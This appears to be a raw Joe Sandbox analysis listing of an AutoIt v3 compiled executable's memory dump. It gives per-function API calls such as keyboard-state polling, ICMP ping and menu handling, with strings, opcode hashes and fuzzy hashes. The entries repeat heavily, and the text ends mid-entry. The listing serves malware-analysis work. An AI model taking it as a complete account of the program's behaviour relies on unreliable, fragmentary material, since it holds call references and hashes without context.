                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                                                                    • String ID: static
                                                                                                                                    • API String ID: 2559357485-2160076837
                                                                                                                                    • Opcode ID: 13dda7f2d54ba761559f8aa13e0b2ff3b946a1a8d2bd515f802008a758c71be7
                                                                                                                                    • Instruction ID: 1df97d7a7648b7e6fda39351703343f2106be8ba35388647f879c09929cb79d3
                                                                                                                                    • Opcode Fuzzy Hash: 13dda7f2d54ba761559f8aa13e0b2ff3b946a1a8d2bd515f802008a758c71be7
                                                                                                                                    • Instruction Fuzzy Hash: 1731CF32114219BFDF119F65DC89FEB3B69FF09764F100229FA15A21A1C731D820DBA0
                                                                                                                                    Function 0027514C Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71windowregistryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00275156
                                                                                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 00275165
                                                                                                                                    • LoadIconW.USER32(00000063), ref: 0027517C
                                                                                                                                    • LoadIconW.USER32(000000A4), ref: 0027518E
                                                                                                                                    • LoadIconW.USER32(000000A2), ref: 002751A0
                                                                                                                                    • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 002751C6
                                                                                                                                    • RegisterClassExW.USER32(?), ref: 0027521C
                                                                                                                                      • Part of subcall function 00263411: GetSysColorBrush.USER32(0000000F), ref: 00263444
                                                                                                                                      • Part of subcall function 00263411: RegisterClassExW.USER32(00000030), ref: 0026346E
                                                                                                                                      • Part of subcall function 00263411: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0026347F
                                                                                                                                      • Part of subcall function 00263411: InitCommonControlsEx.COMCTL32(?), ref: 0026349C
                                                                                                                                      • Part of subcall function 00263411: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 002634AC
                                                                                                                                      • Part of subcall function 00263411: LoadIconW.USER32(000000A9), ref: 002634C2
                                                                                                                                      • Part of subcall function 00263411: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 002634D1
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                                    • String ID: #$0$AutoIt v3
                                                                                                                                    • API String ID: 423443420-4155596026
                                                                                                                                    • Opcode ID: d0304a20989a57d83f6877250a26bd02967575a3d6eeebec4f2b8ff22282e35c
                                                                                                                                    • Instruction ID: d6f084f6060747962e7fe285d2215e08bf4dd9518f29cdcfc9b6007218b39e2e
                                                                                                                                    • Opcode Fuzzy Hash: d0304a20989a57d83f6877250a26bd02967575a3d6eeebec4f2b8ff22282e35c
                                                                                                                                    • Instruction Fuzzy Hash: 10215C70D15308EFEB229FA4ED4ABADBBB8FB08710F00456DF504A62A1D7B65951CF84
                                                                                                                                    Function 00287030 Relevance: 16.8, APIs: 11, Instructions: 258COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • _memset.LIBCMT ref: 0028706B
                                                                                                                                      • Part of subcall function 00288D58: __getptd_noexit.LIBCMT ref: 00288D58
                                                                                                                                    • __gmtime64_s.LIBCMT ref: 00287104
                                                                                                                                    • __gmtime64_s.LIBCMT ref: 0028713A
                                                                                                                                    • __gmtime64_s.LIBCMT ref: 00287157
                                                                                                                                    • __allrem.LIBCMT ref: 002871AD
                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 002871C9
                                                                                                                                    • __allrem.LIBCMT ref: 002871E0
                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 002871FE
                                                                                                                                    • __allrem.LIBCMT ref: 00287215
                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00287233
                                                                                                                                    • __invoke_watson.LIBCMT ref: 002872A4
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 384356119-0
                                                                                                                                    • Opcode ID: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
                                                                                                                                    • Instruction ID: 060249cc58cf1cd563ed1c8a1adfaa1019a2f80ee881a16924e455d28f77dc83
                                                                                                                                    • Opcode Fuzzy Hash: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
                                                                                                                                    • Instruction Fuzzy Hash: F7710B75A25717ABDB14FE79CC81B5AB3A8AF10324F24423AF914E76C1E770DD608B90
                                                                                                                                    Function 002C2CCE Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • _memset.LIBCMT ref: 002C2CE9
                                                                                                                                    • GetMenuItemInfoW.USER32(00327890,000000FF,00000000,00000030), ref: 002C2D4A
                                                                                                                                    • SetMenuItemInfoW.USER32(00327890,00000004,00000000,00000030), ref: 002C2D80
                                                                                                                                    • Sleep.KERNEL32(000001F4), ref: 002C2D92
                                                                                                                                    • GetMenuItemCount.USER32(?), ref: 002C2DD6
                                                                                                                                    • GetMenuItemID.USER32(?,00000000), ref: 002C2DF2
                                                                                                                                    • GetMenuItemID.USER32(?,-00000001), ref: 002C2E1C
                                                                                                                                    • GetMenuItemID.USER32(?,?), ref: 002C2E61
                                                                                                                                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 002C2EA7
                                                                                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 002C2EBB
                                                                                                                                    • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 002C2EDC
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 4176008265-0
                                                                                                                                    • Opcode ID: e4ce6e1c9d68b4fc6005e8cb9e1b3203d681c1ad5a1d93b5ee8e0373a776cf86
                                                                                                                                    • Instruction ID: 068cc79fbc03e5cd51fc2e9cc4e0f45bd67f570f7f0f3dbba69a968c41eda2ec
                                                                                                                                    • Opcode Fuzzy Hash: e4ce6e1c9d68b4fc6005e8cb9e1b3203d681c1ad5a1d93b5ee8e0373a776cf86
                                                                                                                                    • Instruction Fuzzy Hash: CE618A7092024AEFDB21DF64DC88EBE7BB8FB01354F14466DE841A7251DB71AD29DB20
                                                                                                                                    Function 002E7548 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 002E75CA
                                                                                                                                    • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 002E75CD
                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 002E75F1
                                                                                                                                    • _memset.LIBCMT ref: 002E7602
                                                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 002E7614
                                                                                                                                    • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 002E768C
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$LongWindow_memset
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 830647256-0
                                                                                                                                    • Opcode ID: bc6e32b143f373650cabb9a6257785bc9ea392601d7ed57d828a272f04a86eaa
                                                                                                                                    • Instruction ID: 422bc774d4376296cc20e9d2b3c94f8886fb4c59535ae404eb1ebe5b2cf1ef34
                                                                                                                                    • Opcode Fuzzy Hash: bc6e32b143f373650cabb9a6257785bc9ea392601d7ed57d828a272f04a86eaa
                                                                                                                                    • Instruction Fuzzy Hash: 4D618B75950248AFDB21DFA8CC85EEEB7F8EB09710F500199FA14A72A1C770AD51DB60
                                                                                                                                    Function 002B77B6 Relevance: 16.6, APIs: 11, Instructions: 123COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • #41.OLEAUT32(0000000C,?,?,?,?,?,?,?,?,002B756E,?,?,?,?,?,002B779C), ref: 002B77DD
                                                                                                                                    • #37.OLEAUT32(?,?,?,?,?,?,?,002B756E,?,?,?,?,?,002B779C,?,?), ref: 002B7836
                                                                                                                                    • #8.OLEAUT32(?,?,?,?,?,?,?,002B756E,?,?,?,?,?,002B779C,?,?), ref: 002B7848
                                                                                                                                    • #23.WSOCK32(?,?,?,?,?,?,?,?,002B756E), ref: 002B7868
                                                                                                                                    • #10.WSOCK32(?,?,00000002,?,?,?,?,?,?,?,002B756E), ref: 002B78BB
                                                                                                                                    • #24.OLEAUT32(?,00000002,?,?,?,?,?,?,?,002B756E), ref: 002B78CF
                                                                                                                                    • #9.WSOCK32(?,?,?,?,?,?,?,002B756E), ref: 002B78E4
                                                                                                                                    • #39.OLEAUT32(?,?,?,?,?,?,?,002B756E), ref: 002B78F1
                                                                                                                                    • #38.OLEAUT32(?,?,?,?,?,?,?,002B756E), ref: 002B78FA
                                                                                                                                    • #9.WSOCK32(?,?,?,?,?,?,?,002B756E), ref: 002B790C
                                                                                                                                    • #38.OLEAUT32(?,?,?,?,?,?,?,002B756E,?,?,?,?,?,002B779C,?,?), ref: 002B7917
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 92f91331c99117a0e7becca170d710a7dac0519c2b0db2f33f019934c0a562b2
                                                                                                                                    • Instruction ID: 8e6f95d9bc55966a9465f3a8bc3034da3c0bb59a75966dddb5abf5115729e3b4
                                                                                                                                    • Opcode Fuzzy Hash: 92f91331c99117a0e7becca170d710a7dac0519c2b0db2f33f019934c0a562b2
                                                                                                                                    • Instruction Fuzzy Hash: 00415335A10119EFDB00DFA4DC889EDBBB9FF48394F008069E955A7261CB70AA95DF90
                                                                                                                                    Function 002C0508 Relevance: 16.6, APIs: 11, Instructions: 120keyboardCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetKeyboardState.USER32(?), ref: 002C0530
                                                                                                                                    • GetAsyncKeyState.USER32(000000A0), ref: 002C05B1
                                                                                                                                    • GetKeyState.USER32(000000A0), ref: 002C05CC
                                                                                                                                    • GetAsyncKeyState.USER32(000000A1), ref: 002C05E6
                                                                                                                                    • GetKeyState.USER32(000000A1), ref: 002C05FB
                                                                                                                                    • GetAsyncKeyState.USER32(00000011), ref: 002C0613
                                                                                                                                    • GetKeyState.USER32(00000011), ref: 002C0625
                                                                                                                                    • GetAsyncKeyState.USER32(00000012), ref: 002C063D
                                                                                                                                    • GetKeyState.USER32(00000012), ref: 002C064F
                                                                                                                                    • GetAsyncKeyState.USER32(0000005B), ref: 002C0667
                                                                                                                                    • GetKeyState.USER32(0000005B), ref: 002C0679
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: State$Async$Keyboard
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 541375521-0
                                                                                                                                    • Opcode ID: f4b1d9ee49a14c783defa323a9a2a5d0463db07cb87f57dc6ef2037d63ed942c
                                                                                                                                    • Instruction ID: d35bcedeb35edaaf4ee65807a0320876d8192923e47738ec6005350f809d120e
                                                                                                                                    • Opcode Fuzzy Hash: f4b1d9ee49a14c783defa323a9a2a5d0463db07cb87f57dc6ef2037d63ed942c
                                                                                                                                    • Instruction Fuzzy Hash: 9B41F9609147CB9EFF308E648884BB5BEA4BF51344F44425DD5C5461C2EAE499F8CF91
                                                                                                                                    Function 002D8AA5 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00264D37: __itow.LIBCMT ref: 00264D62
                                                                                                                                      • Part of subcall function 00264D37: __swprintf.LIBCMT ref: 00264DAC
                                                                                                                                    • CoInitialize.OLE32 ref: 002D8AED
                                                                                                                                    • CoUninitialize.OLE32 ref: 002D8AF8
                                                                                                                                    • CoCreateInstance.OLE32(?,00000000,00000017,002F3BBC,?), ref: 002D8B58
                                                                                                                                    • IIDFromString.OLE32(?,?), ref: 002D8BCB
                                                                                                                                    • #8.OLEAUT32(?), ref: 002D8C65
                                                                                                                                    • #9.WSOCK32(?,?), ref: 002D8CC6
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateFromInitializeInstanceStringUninitialize__itow__swprintf
                                                                                                                                    • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                                    • API String ID: 1994486276-1287834457
                                                                                                                                    • Opcode ID: 0c65c0dca36c3f8ceb915970dd0f7f43411cc260e7902ae40b0efb0f1e3e62ff
                                                                                                                                    • Instruction ID: 0c6cfda31d22d5c959da84101d7a94dd1a74b2145eef23dd4dad7c030ae9f930
                                                                                                                                    • Opcode Fuzzy Hash: 0c65c0dca36c3f8ceb915970dd0f7f43411cc260e7902ae40b0efb0f1e3e62ff
                                                                                                                                    • Instruction Fuzzy Hash: C5619E70228711EFD714DF14C889B6AB7E8AF45758F00485BF9859B391CB70ED54CBA2
                                                                                                                                    Function 002D5E1D Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163fileCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • #115.WSOCK32(00000101,?), ref: 002D5E7E
                                                                                                                                    • #10.WSOCK32(?,?,?), ref: 002D5EC3
                                                                                                                                    • #52.WSOCK32(?), ref: 002D5ECF
                                                                                                                                    • IcmpCreateFile.IPHLPAPI ref: 002D5EDD
                                                                                                                                    • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 002D5F4D
                                                                                                                                    • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 002D5F63
                                                                                                                                    • IcmpCloseHandle.IPHLPAPI(00000000), ref: 002D5FD8
                                                                                                                                    • #116.WSOCK32 ref: 002D5FDE
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Icmp$EchoSend$#115#116CloseCreateFileHandle
                                                                                                                                    • String ID: Ping
                                                                                                                                    • API String ID: 1853569507-2246546115
                                                                                                                                    • Opcode ID: 8c58c46f50be3580bda9ecd22621e63a82275cde0224b83079cc9d76b3abc0bf
                                                                                                                                    • Instruction ID: 5f8b6ef6b6b08917667cce406704ebffea6ddd27f15ed504cd61a9f9f495bce8
                                                                                                                                    • Opcode Fuzzy Hash: 8c58c46f50be3580bda9ecd22621e63a82275cde0224b83079cc9d76b3abc0bf
                                                                                                                                    • Instruction Fuzzy Hash: AF5192316246119FD710EF24DC89B2AB7E4AF49760F14852AF5599B3A1DBB0ED10CF42
                                                                                                                                    Function 00274D83 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151windowtimeregistryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • DefWindowProcW.USER32(?,?,?,?), ref: 00274E22
                                                                                                                                    • KillTimer.USER32(?,00000001), ref: 00274E4C
                                                                                                                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00274E6F
                                                                                                                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00274E7A
                                                                                                                                    • CreatePopupMenu.USER32 ref: 00274E8E
                                                                                                                                    • PostQuitMessage.USER32(00000000), ref: 00274EAF
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                                                    • String ID: TaskbarCreated
                                                                                                                                    • API String ID: 129472671-2362178303
                                                                                                                                    • Opcode ID: f923d34063d2b2bc85a6c95613b0cf5a14ca4f85bd4a2e399e85e057eb24ba0b
                                                                                                                                    • Instruction ID: bd6556425ee250e98bd3231928811e96cd4b704f2b6f1b5f9b3e5f95cef90f00
                                                                                                                                    • Opcode Fuzzy Hash: f923d34063d2b2bc85a6c95613b0cf5a14ca4f85bd4a2e399e85e057eb24ba0b
                                                                                                                                    • Instruction Fuzzy Hash: D541EB3123460BEBDB267F24AC4DBBE7659F740760F108529F509912A2CBB09C71DB62
                                                                                                                                    Function 002CBB06 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 002CBB13
                                                                                                                                    • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 002CBB89
                                                                                                                                    • GetLastError.KERNEL32 ref: 002CBB93
                                                                                                                                    • SetErrorMode.KERNEL32(00000000,READY), ref: 002CBC00
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Error$Mode$DiskFreeLastSpace
                                                                                                                                    • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                                                                    • API String ID: 4194297153-14809454
                                                                                                                                    • Opcode ID: f40c6ccc2b2d601611f6cfae03052d64a7a928a6eab0d6efd8adf7b339b30c7b
                                                                                                                                    • Instruction ID: 874ca173637d61cc1baa6562a46297dea03d89bf6a7bf0f89631aa5cf5087552
                                                                                                                                    • Opcode Fuzzy Hash: f40c6ccc2b2d601611f6cfae03052d64a7a928a6eab0d6efd8adf7b339b30c7b
                                                                                                                                    • Instruction Fuzzy Hash: 6D31A735A202099FC712EF68C846FFDB7B4EF48354F148169EC0597295D7709D51CB51
                                                                                                                                    Function 002C34DD Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 82windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • LoadIconW.USER32(00000000,00007F03), ref: 002C357C
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
